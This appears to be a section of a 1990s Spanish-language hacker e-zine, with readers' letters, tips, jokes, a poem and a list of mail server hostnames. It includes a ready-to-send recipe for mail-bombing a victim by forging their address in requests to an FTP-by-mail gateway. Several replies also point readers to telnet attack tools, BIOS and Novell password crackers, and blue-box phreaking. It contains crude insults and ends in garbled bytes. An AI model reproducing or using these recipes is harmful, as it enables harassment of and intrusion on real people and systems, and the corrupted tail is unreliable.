portland.cbn.net.id
pnccwg.palaunet.com
bonn.netsurf.de
server.compunort.com.ar
mail1-gui.server.virgin.net
nontri.ku.ac.th
mail2.isdnet.net
gandalf.leader.es
smtp-0.indo.net.id
sirius.hkstar.com
triton.worldonline.nl
brickbat8.mindspring.com
ieva06.lanet.lv
www.aiusa.com
brick.purchase.edu
rush.u-netsys.com.br
sweden.it.earthlink.net
SWBELL.net
elf.ecitele.com
future.futureone.com
dinet.de
enterprise.powerup.com.au
ns.ezl.com
zenon.logos.cy.net
dino.mainz.ibm.de
out2.ibm.net
smtp1.wanadoo.fr
beta.mcit.com
hp1.p-ol.com
revere.musc.edu
alpha.ntu.ac.sg
mail.uniserve.com
UTMJB.UTM.MY
mimos.my
deneb.dfn.de
nontri.ku.ac.th
weblock.tm.net.my
mail.secc.cc.ia.us
main.com2com.ru
mail.ptd.net
lilly.ping.de
smtp1.erols.com
crotalus.famu.edu
mail.uniserve.com

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

Saludos esta es una peque¤a manera de optimizar su sistema Win95:

-En el Panel de Control (Control Panel) selecciona el icono del sistema
(System) y clickea en Rendimiento (Performance). Luego abre el menu de
Configuracion de Archivos (File Settings) y en el menu desplegable elige
la opcion "Network Server". Si tienes un CD-ROM de 8x o mas rapido en las
opciones del CD-ROM indicale que quieres un cache peque¤o (small) y en
el menu desplegable deberas elegir "No lectura adelantada" (No read-ahead)

Para acelerar el modem un poco mas para surfear por Internet en el control
panel clikea el icono de "modems". Luego presiona el boton Propiedades
(Properties). Pon como maximo de velocidad la maxima velocidad disponible
- aunque tu modem sea mas lento - y clickea "Conexion" (Connection) y
despues haz click en el boton izquierdo Configuracion del Puerto (Port
Settings), marca la unica cajita y pon al maximo la primer opcion y al
minimo la ultima.


*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^


Algo de poesia 100% mexicana............

Apasionado y hondamente la quiero a usted jo-
ven hermosa, como es natural yo deseo proce-
der con toda prontitud y eficacia al fin de pre-
sentarla luego en el altar de la iglesia y no enga-
¤arla vilmente, pues pienso que es usted es la mas pu-
ra, el modelo envidiable de mujer buena y cas-
ta que pueda haber existido.

Asimismo, deseo depositar en usted, todo el se-
creto de mi alma e impedir que mis venas se que-
men con ardiente pasion y despues de haber for-
malizado nuestras relaciones y haberle comu-
nicado a su madrecita y hermanitas; quedaria mi ver-
dadera pasion correspondida al fin de que la ha-
ga muy feliz ante tanta emocion.

La verdad, le digo, que el mas afortunado cu-
pido, mirandonos con tan ardiente anhe-
lo, envidiaria nuestra dicha pues creame que el co-
nocer la felicidad matrimonial que desea toda mu-
jer es lo mas importante en la vida...

Ahora lean solo las lineas impares. Saludos.

Azumlord

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

Cual es el tio que mas largo?
El guardia civil pues nace en Andalucia y va a morir hasta el pais Vasco.

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

De: Plaxius
Para: Todos

Feliz navidad y a¤o nuevo a todos. Ha sido excelente conocerlos a todos
los habitantes de internet, a todas las culturas, en fin. A todos!

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

¨En verdad quieres joder a esa personita bombardeando su direccion de email?
Pues manda un mensaje a: BITFTP@PUCC.PRINCETON.EDU Con esto en el cuerpo del
mensaje:

FTP ftp.cdrom.com UUENCODE
USER anonymous
cd /pub/idgames2/quake2/official/
get q2-309.exe
QUIT

Mandalo como unas cinco veces con intervalos de 10 minutos cada uno y
recuerda cambiar la direccion origen por la de tu objetivo.

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

Cualquier cracker ahora puede usar telnet para atakar cualquier servidor
y cualquier puerto sin temor a ser descubierto. Todo esto gracias a Java:

http://www.netobjective.com/java/telnet.html

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Con la utilidad para crear diccionarios de palabras para crackear
>passwords he conseguido una buena lista, pero como la utilizo con las
>ventanas de password (especialmente la de acceso a la BIOS)?

imposible mejor consigue el "bios cracker" haz una busqueda de esa palabra
en alguna maquina de busqueda y encontraras el archivo. Quizas ya este en la
seccion de software de RareGaZz

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>- En las Nowhere Utilities, con el comando Cipher puedo encriptar
> archivos pero despues no se como desencriptarlos, he leido las instrucciones
> y dicen que hay que ejecutar el programa de nuevo con la contrase¤a pero lo
> unico que hace es volverlos a encriptar; como hago para desencriptar?

Nup! el comando cipher NO ENCRIPTA, CIPHEREA. Codifica un archivo con una
clave y los descodifica de la misma manera. Vamos intentalo!

cipher 123 archivo.txt (encriptar)
cipher 123 archivo.txt (desencriptar)

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Podriais hacer un articulo explicando con ejemplos cada una de las utilidades
>de Nowhere Man y sus funciones si no es pedir demasiado?

claro que puedo, magnifica idea!

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

En un numero de la revista se pedian canales de IRC de habla hispana, yo
he encontrado algunos y espero que a alguien le vengan bien.
NOTA: Todos los canales tienen el puerto 6667

irc.arrakis.es
irc.lleida.net
irc.catalunya.net
irc.servicom.es => recomendado
irc.encomix.es => recomendado
irc.ctv.es
irc.jet.es
irc.ergos.es
irc.i3d.es
irc.eui.upv.es
irc.mundivia.es
irc.ibernet.es
irc.lander.es
irc.teleline.es
irc.ceta.es
194.224.67.3
irc.virtualsw.es
irc.amadeus.es
irc.ergos.es
irc.valnet.es
es.undernet.org

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Es patetica vuestra referencia a los HIJOSDEMALAPUTA de ETA en la revista 009.
>Por favor, no opineis de lo que no conoceis que la cagais nombre del CHE y la
>palabra ZAPATISTAS con la de ETA es denigrar a los dos primeros... QUE
>ATREVIDA ES LA IGNORANCIA!!!!!!!!!!! opinar de lo que sabeis (que sabeis
>mucho, no de lo que desconoceis. Os suena Miguel Angel blanco???? recibio dos
>balas de cal.22 por el simple echo de vivir, sentir y amar. Por lo demas
>seguir asi... vuestra revista es muy buena. Un saludo de Asturcon
>P.D: si quereis hablar del tema de ETA e informaos de lo que ocurre no teneis
>mas que decirlo en vuestra revista.

ehhhh... nadie dijo que ETA fuera similar o parecido al Che o a los
Zapatistas. Y bueno, que fue lo que dijimos de ETA?
" Si ETA dejara de hacer coches bomba, ¨quien se acordaria de ellos? "
Es o no verdadero!?

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Queria hacer un comentario sobre una frase que lei en la RaregazZ.
>La frase decia algo asi como...
>
>"Si los de ETA no pusiesen coches bomba, nadie se acordaria de ellos".
>No capto el sentido de la frase, es decir, no se si les apoyais o que...:-?
>
> Solo quiero decir que los de ETA son los peores ¨seres humanos? de
>la tierra, y por ello no se merecen ni siquiera ser mencionados en este
>fantastico e-zine.... Ya se que en la revista se tratan de temas
>anarquicos, pero lo de ETA no puede meterse dentro de esta calificacion.
>Son unos terroristas HIJOS DE PUTA, y habria que acabar con todos ellos...
>­VASCOS SI, ETA NO!
>
> Seguir asi de bien... :-) Hackerz Rulez!

La respuesta es la misma que arriba...

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>...otra cosa que queria saber es como se conecta a una bbs ya que soy un
>novato en este campo.

Usando tu programa de Telnet (si usas windows95 escribe telnet en c:\windows)
y selecciona conectar, despues escribe sinet.sinet.com.mx y cuando aparezca
Login: escribe BBS despues te das de alta o entras de invitado. Presionando
la T(alk) y luego la C(hat) podras platicar con personas de Mexico. En
ocasiones por ahi puedes encontrarme con mi Nick. Raretrip

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

Aquellos que escriben solicitando la forma de llamar gratis desde telefonos
de tarjeta por favor manden email a truco haciendo esa pregunta.

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>pero como entrar a esos tipos de servidores.....si cuando me voy a conectar
>me da un mensaje: fallo en la conexi=n

Esos servidores estan detras de una firewall o barrera de fuego. Existen
algunos scripts perl que puedes configurar en tu sistema para poder usar
telnet o ftp mas alla de la firewall.

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Que tal viejo, oye he leido articulos gavachos acerca del phreacking, y
>de hecho ya cuento con varios programas de blue boxing, pero no he
>podido hacer ninguna maldita llamada de larga distancia gratis !!!!
>Segun esto lo estoy haciendo bien ... checa si mi procedimiento esta
>bien :
>
>1. llamar a un numero 91-800...
>2. Cuando haya seqal de respuesta (tono de ocupado, tono de marcando, o
>grabacion)
>
> hago lo siguiente :
> (mando tono de 2600 hz) + KP + (91+LADA+Numero) + ST
>
>ej. de numero: 0164 180945 Estoy utilizando un set de marcado tipo
>CCITT 5, ta trate con un set DTMF y tampoco.
>
>? Que demonios estoy haciendo mal ????????

No estoy seguro de que esa sea la manera para hacer llamadas gratis aqui en
Mexico...

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

> Tengo una peque¤a pregunta , Como se puede interceptar mails? porque a
>mi una persona me los ha estado interceptando Y ME LOS ENVIA DE NUEVO
>PERO deformandoS !! YA TENGO SU E-MAIL !!!

Obviamente esta persona tiene tu password y te esta jugando una broma pesada.
por eso debes escoger passwords seguros y mantenerlo secreto.

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>el administrador de una red novell 3.12 se retiro de un momento a otro y no
>dejo el password de Supervisor, quisiera saber si existe alguna manera de
>pasar dicha seguridad o en todo caso como averiguarlo. Gracias de antemano
>por su ayuda. Saludos.

Busca en nuestra pagina de software los programas para Novell...

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>1.- ¨ Si yo tengo PGP 5.0 y alguien tiene una version anterior, el me
>puede mandar mensajes encriptados y que yo los pueda leer ?

Asi es.

>2.- ¨ PGP 5.0 puede encriptar archivos y mensajes usando DES ?

No. DES ha desaparecido en la version 5.0 de PGP debido a problemas de
licencia.

>3.- ¨ Se puede extraer la llave secreta del PGP 5.0 ?

Si. Abre el PGPKEYS y usa la opcion exportar que aparece cuando presionas
el boton derecho del raton. Despues selecciona la opcion importar para
a¤adir las llaves (publica y secreta).

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

> ¨ Y que paso con lo del posible hack a el server de IFE por parte
> de RdK , en las pasadas elecciones del jefe de gob. del D.F ?

Las computadoras del IFE no estan conectadas a Internet como inicialmente
pensaron. Resulto ser un simple servidor para paginas web solamente.

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Banda, en el n. 7 pusieron un asertijo sobre un hombre que tenia que pasar
>un puente. Una situacion similar, le ocurre a Sancho Panza (escudero del
>quijote) en una de sus aventuras. Cervantes resuelve el problema apelando a
>la moral y la etica, habiendo dado Sancho un frase tan ingeniosa , y siendo
>que hagan lo que hagan, habran sido injustos, deciden perdonarle la vida y
>dejarle pasar. (Solucion de Cervantes, no mia)

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Condorito el personaje proveniente de pelotillehue, creado por Pepo.
>Sera la mascota oficial del windows 98 en America; si, microsoft compro
>los derechos de este personaje para incorporarlo en su nuevo sistema
>operativo.

El monopolio mas grande de USA invade America... y se sale con la suya.

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>1- Publiquen de cuando en cuando programas completos (los fuentes por
>supuesto) de algunos jueguitos, aunque sean los mas mamilas que existan
>PacMan, Tetris y mamaditas de esas, a los que estudiamos nos gustan esas
>mamaditas.

Algun programador interesado en compartir codigo fuente con los lectores?
si pudiera a¤adir breves comentarios al codigo seria fenomenal!

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

CARTA DEL JEFE INDIO

¨Como se puede comprar o vender el firmamento, ni aun el calor de la tierra?.
Dicha idea nos es desconocida. Si no somos due¤os de la frescura del aire ni
del fulgor de las aguas ¨Como podrian ustedes comprarlos? Cada parcela de
esta tierra es sagrada para mi pueblo. Cada brillante mata
de pino, cada grano de arena de las playas, cada gota de rocio en
los oscuros bosques, cada altozano y hasta el sonido de cada insecto es
sagrado a la memoria y al pasado de mi pueblo. La savia que circula por
las venas de los robles lleva consigo las memorias de los pieles rojas.
Los muertos del hombre blanco olvidan su pais de origen cuando emprenden
sus paseos por las estrellas; en cambio, nuestros muertos nunca pueden
olvidar esa bondadosa tierra, puesto que es la madre de los pieles rojas.
Somos parte de la tierra y asi mismo, ella es parte de nosotros. Las flores
perfumadas son nuestras hermanas; el venado, el caballo, la gran guila;
estos son nuestros hermanos. Las escarpadas pe¤as, los humedos prados, el
calor del cuerpo del caballo y el hombre, todos pertenecemos a la misma
familia.

Por todo ello cuando el Gran Jefe de Washington nos envia el mensaje
de que quiere comprar nuestras tierras dice que nos reservar un lugar en el
que podamos vivir confortablemente entre nosotros. El se convertir en nuestro
padre y nosotros en sus hijos. Por ello consideramos su oferta de comprar
nuestras tierras. Ello no es facil, ya que esta tierra es sagrada para
nosotros.
El agua cristalina que corre por los rios y arroyuelos no es solamente
agua, sino, tambien, representa la sangre de nuestros antepasados. Si le
vendemos nuestra tierra deben recordar que es sagrada y a la vez deben
ense¤ar a sus hijos que es sagrada y cada reflejo fantasmagorico en las
claras aguas de los lagos cuenta los sucesos y memorias de las vidas de
nuestras gentes.
El murmullo del agua es la voz del padre de mi padre.
Los rios son nuestros hermanos y sacian nuestra sed; son portadores de
nuestras canoas y alimentan a nuestros hijos. Si les vendemos nuestras
tierras, ustedes deben recordar y ense¤arles a sus hijos que los rios son
nuestros hermanos y tambien lo son suyos y, por lo tanto, deben tratarlos con
la misma dulzura con la que se trata a un hermano.
Sabemos que el hombre blanco no comprende nuestro modo de vida.
El no sabe distinguir entre un pedazo de tierra y otro, ya que es un
extra¤o que llega de noche y toma de la tierra lo que necesita.
La tierra no es su hermana, sino su enemiga, y una vez conquistada sigue
su camino, dejando atras la tumba de sus padres sin importarle. Le secuestra
la tierra a sus hijos. Tampoco le importa, tanto la tumba de sus padres como
el patrimonio de sus hijos son olvidados. Trata a su madre, la tierra, y a su
hermano, el firmamento, como objetos que se compran, se explotan y se venden
como ovejas o piedras de colores. Su apetito devorar la tierra, dejando atras
solo un desierto.
No se, pero nuestro modo de vida es diferente al de ustedes. La sola
visita de sus ciudades apenan los ojos del piel roja. Pero quiza sea por
que el piel roja es un salvaje y no comprende nada.
No existe un lugar tranquilo en las ciudades del hombre blanco, ni hay
sitio donde escuchar como se abren las hojas de los arboles en primavera o
como aletean los insectos. Pero quiza tambien esto debe ser porque soy
un salvaje que no comprende nada. El ruido solo parece insultar nuestros
oidos. Y despues de todo, ¨para que sirve la vida si el hombre no puede
escuchar el grito solitario del chotacabras ni las discusiones nocturnas de
las ranas al borde de un estanque?. Soy un piel roja y nada entiendo.
Nosotros preferimos el suave susurro del viento sobre la superficie de un
estanque, asi como el olor de ese mismo viento purificado por la lluvia del
mediodia o perfumado con aromas de pinos. El aire tiene un valor inestimable
para el piel roja, ya que todos los seres comparten un mismo aliento, la
bestia, el arbol, el hombre, todos respiramos el mismo aire. El hombre blanco
no parece consciente del aire que respira; como un moribundo que agoniza
durante muchos dias es insensible al olor. Pero si les vendemos nuestras
tierras, deben recordar que el aire nos es inestimable, que el aire comparte
su espiritu con la vida que sostiene. El viento que dio a nuestros abuelos el
primer soplo de vida tambien recibe sus ultimos suspiros. Y si les vendemos
nuestras tierras, ustedes deben conservarlas como cosa aparte y sagrada, como
un lugar donde hasta el hombre blanco pueda saborear el viento perfumado por
las flores de las praderas.
Por ello, consideramos su oferta de comprar nuestras tierras y si decidimos
aceptarla yo pondre una condicion: el hombre blanco debe tratar a los animales
de esta tierra como a sus hermanos. Soy un salvaje y no comprendo otro modo de
vida. He visto a miles de bufalos pudrirse en las praderas, muertos a tiros
por el hombre blanco desde un tren en marcha. Soy un salvaje y no comprendo
como una maquina humeante puede importar mas que el bufalo, al que nosotros
solo matamos para sobrevivir
¨Que seria del hombre sin los animales? Si todos fueran exterminados, el
hombre moriria de una gran soledad espiritual; porque lo que suceda a los
animales tambien le sucedera al hombre, todo va enlazado. Deben ense¤arles a
sus hijos que el suelo que pisan son las cenizas de nuestros abuelos.Inculquen
a sus hijos que la tierra esta enriquecida con las vidas de nuestros
semejantes a fin que sepan respetarla. Ense¤en a sus hijos que nosotros hemos
ense¤ado a los nuestros que la tierra es nuestra madre; y que todo lo que le
ocurra a la tierra le ocurrira a los hijos de la tierra. Si los hombres
escupen en el suelo, se escupen a si mismos. Esto sabemos: la tierra no
pertenece al hombre; el hombre pertenece a la tierra. Esto sabemos: todo va
enlazado, como la sangre que une una familia. Todo va enlazado.
El hombre no tejio la trama de la vida; el solo es un hijo. Lo que hace con
la trama se lo hace a si mismo. Ni siquiera el hombre blanco, cuyo Dios pasea
y habla con el de amigo a amigo, queda exento del destino comun. Despues de
todo quiza seamos hermanos. Ya veremos. Sabemos una cosa que quiza el hombre
blanco descubra algun dia: nuestro Dios es el mismo Dios. Ustedes pueden
pensar ahora que El les pertenece, lo mismo que desean que nuestras tierras
les pertenezcan, pero no es asi. El es el Dios de los hombres y su compasion
se comparte por igual entre el piel roja y el hombre blanco. Esta tierra tiene
un valor inestimable para El, y si se da¤a se provocaria la ira del Creador.
Tambien los blancos se extinguiran, quiza antes que las demas tribus.
Contaminan sus lechos y una noche pereceran ahogados en sus propios residuos.
Pero ustedes caminaran hacia su destruccion rodeados de gloria, inspirados por
la fuerza de Dios que os trajo a esta tierra y que, por algun designio
especial, les dio dominio sobre ella y sobre el piel roja. Ese destino es un
misterio para nosotros, pues no entendemos por que se exterminan los bufalos,
se doman los caballos salvajes, se saturan los rincones secretos de los
bosques con el aliento de tantos hombres y se atiborra el paisaje de las
exuberantes colinas con cables parlantes. ¨Donde esta el matorral? Destruido.
¨Donde esta el aguila? Desaparecio.Termina la vida y empieza la supervivencia.

"Este mail esta echo con las ultimas neuronas de mi cerebro privilegiado, y
debo mantenerlas por lo que no se volvera a leer ni a corregir las faltas
ortograficas" Colaboracion por Pata.

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

Lamento lo que esta pasando en Geocities, pero ya sabeis
que los hermanos del norte (el hermano Cain...si EEUU) no
desean el progreso intelectual del resto del mundo, porque
ellos son mongolicos y se creen los due¤os del intelecto.
Pero no desmayeis. El mundo H/C/P/V/A esta con vosotros.

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

ƒ Rfh‰g{3z á •ª¾e{H10 ŠGÝX d¿>esd+›ŒöGW‚~¤‰¿1üTrfNŠ•#Sicanl*$ Ù MÎSŽŒ
¥8 rägü8z@DgFã$T.Ë|M …-ü Eˊ3î¥&îûŠõ@OM $šze‡W‹ גBüX

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT